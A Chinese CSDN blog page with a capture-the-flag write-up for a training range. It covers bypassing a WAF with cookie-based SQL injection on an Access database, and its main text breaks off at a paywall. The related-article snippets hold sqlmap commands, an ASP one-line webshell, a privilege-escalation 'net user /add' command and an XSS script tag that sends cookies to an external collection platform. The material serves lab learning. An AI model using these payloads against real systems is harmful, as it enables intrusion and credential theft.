封神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!

最新推荐文章于 2024-09-04 20:10:26 发布
最新推荐文章于 2024-09-04 20:10:26 发布
阅读量3.5k 收藏 9
点赞数 2
分类专栏: 渗透学习 靶场练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x_yhy/article/details/96377425
版权
本文详细介绍了两种解决网站安全防护措施的方法,涉及SQL注入点的寻找、利用Cookie绕过、猜解数据库信息及字段,最后成功登录后台获取flag。在解法一中,通过测试发现Access数据库的注入点并猜出表名和字段,解密密码。解法二则侧重于后台路径的爆破,提供多种可能的后台URL组合。
摘要由CSDN通过智能技术生成

解法一

1.找注入点

进去之后,查看新闻,一般在这里有注入点。
在这里插入图片描述
输入

?id=168 and 1=1
在这里插入图片描述

过滤了一些关键字,通过测试没有过滤 == order by、union ==
,其它暂时没发现。经过一系列的绕过测试,还是没能成功。
在这里插入图片描述
看别人的WriteUp,发现可以通过Cookie进行绕过。给出的解释是:网页防护一般只拦截get、post传参。可以使用ModHeader插件进行修改Request header。(PS:一开始我用Burp,但是后来发现还是ModHeader好用,方便。)

2.猜列数、表名,爆显示位

通过测试,发现查询了10列。数据库好像是access,第一次做access注入,上网查了一下,发现access数据库并不像mysql那样方便,可以拥有information

最低0.47元/天 解锁文章
向那风
关注
专栏目录
获取目标服务器c盘下flag文件信息,公开课基础演练靶场 第六章 webshell控制目标详细解题思路...
weixin_42442653的博客
08-06 1118
我看见第六章的传送门上写着大大的两个字--提权!!在上一章中,我已经通过上传一句话马,用菜刀连接了上传的这个文件,从而得到了后台的部分权限。但是我试过,现在拥有的权限,还不能打开c盘中的文件。而C盘中的文件往往都是比较重要的,因此,我需要提升自己的权限,如下图。进入传送门后,发现这一章的网站仍然是之前看到过的那个。而这个网站的管理员cookie已经被我拿到,并且已经成功上传一句话马至服务器了,如下...
cookie注入学习笔记
XiaoXiao_RenHe的专栏
04-14 1652
简单操作的cookie注入。
第二章遇到阻难绕过WAF过滤
m0_51195235的博客
12-14 477
第二章遇到阻难绕过WAF过滤
神台靶场---尤里复仇Ⅰ小芳!---第二章遇到阻难绕过WAF过滤
qq_44336568的博客
06-28 1622
神台----尤里复仇I-第二章遇到阻难绕过WAF过滤!渗透学习、靶场练习
第二章遇到阻难绕过WAF过滤
m0_48294281的博客
01-05 1467
靶场学习心得,欢迎学习交流!
神台--第二章遇到阻难绕过WAF过滤!解题思路
04-12 5632
神台--第二章遇到阻难绕过WAF过滤!解题思路 一、查找sql注入点 进入测试页面http://59.63.200.79:8004/ 1)字符型、数字型等盲注尝试 随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下 网站对请求地址进行了WAF防护,通过测试没有过滤 ==order by、union== 网页防护一般只拦截get、post传参,因此尝试cookie注入 2)cookie注入 cookie注入提交的参数以cookie方式提交,判断步骤 1.找到...
神台 第二章 绕过WAF
m0_65712192的博客
10-14 801
神台 第二章 利用ModHeader绕过WAF
神台----尤里复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1507
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
神台----尤里复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 1921
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
神台----尤里复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 1930
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2079
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
掌控安全靶场第二章遇到阻难绕过WAF过滤
k1k5cn的博客
11-10 2554
最近在学习CTF,前不久发现一个还不错的靶场 神台 - 掌控安全在线演练靶场 二话不说,开干吧 第二章遇到阻难绕过WAF过滤! 一、测试是否有注入点 附上链接 https://hack.zkaq.cn/battle/target?id=31ac789a52edf9bb 标题上写了是【配套课时:SQL注入攻击原理 实战演练】SQL注入, 随便点击一个新闻。在id=171后面加一个引号’,测试一下是否有SQL注入。 有弹框了,提示过滤了很多关键字。下一步考虑如何绕过这些关键字。 二、绕过WAF关键字过滤
CTF神台 第二章遇到阻难绕过WAF过滤
最新发布
2302_79513487的博客
09-04 137
众所周知,cookie是用来验证身份的,那如果我们把注入参数塞到cookie里面,是不是就可以轻松的绕过了,废话不多说,我们开始实战。然后我们拿目录扫描工具(dirsearch、菜刀爬站版、御剑等)FUZZ一下。admin和b9a2a2b5dffb918c(MD5解密为welcome)可以看出来存在cookie注入漏洞,接下来我们就可以往里面输入注入参数了。我们在进行SQL注入渗透测试的时候,往往会碰到以下这种情况。2,3,7,8,9字段可以注入。首先F12呼出控制台。最后成功拿到flag。
第二章遇到阻难绕过WAF过滤!【SQL注入攻击】
野马菲比的博客
07-21 1084
爆破andexists(select*from表名),如果页面返回正常,就存在这个表。exists这个函数就是检查子查询能否查询到数据,如果能会返回一个True。靶场http//kypt8004.ia.aqlab.cn/根据md5的特征,猜测为md5加密;解密为welcome。1、判断是否存在注入,发现有过滤。说明存在admin表。如果不知道字段怎么办?就一个库,无需知道。...
神台——WAF绕过
Zichel77的博客
07-04 654
没看到id,还是点进一篇新闻看看,因为新闻的页面是和新闻网站数据库产生交互的 是你呀id 是网站下的shownews.asp这个ASP动态网页文件,与数据库进行交互,并查询出了第171篇(id=171)新闻内容的值。 按照上次的老套路 准备来手工注入,构造 and 1=1 我人都要被吓尿了,感觉自己是不是会被请去喝茶 但是毕竟是练习,已经提醒了会有waf拦截,但是他只阻碍了传参中的一些参数,刚刚的and就被禁了 那我试一下不用and 注意,此题使用的是Access数据库,与MyS..
神台-尤里复仇
weixin_44522540的博客
02-20 858
神台-尤里复仇Ⅰ 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录神台-尤里复仇Ⅰ前言一、为了女神小芳二、1.引入库2.读入数据三、四、为了更多的权限!留言板!五、六、七、八、九、总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
神台】SQL注入绕过WAF练习(cookie注入)
00勇士王子的博客
11-17 3477
题目 解题过程 进入网站 随便点击一个新闻,出现参数id,进行单引号测试: 提示参数不能包含非法字符,应该是黑名单过滤 猜测是cookie注入 burp抓包,将参数放入cookie中,页面正常访问: 单引号测试,页面报错,没有警告弹出 sqlmap跑出payload python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 跑出表 python sqlmap.py
神台 - 掌控安全靶场】尤里复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
TD-LTE通信技术:现状、关键与未来展望
【TD-LTE通信技术概述】 TD-LTE,全称为Time Division Duplex Long Term Evolution,即时分双工长期演进,是3GPP组织定义的一种4G移动通信标准,是TD-SCDMA(时分同步码分多址)向4G演进的路径。...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值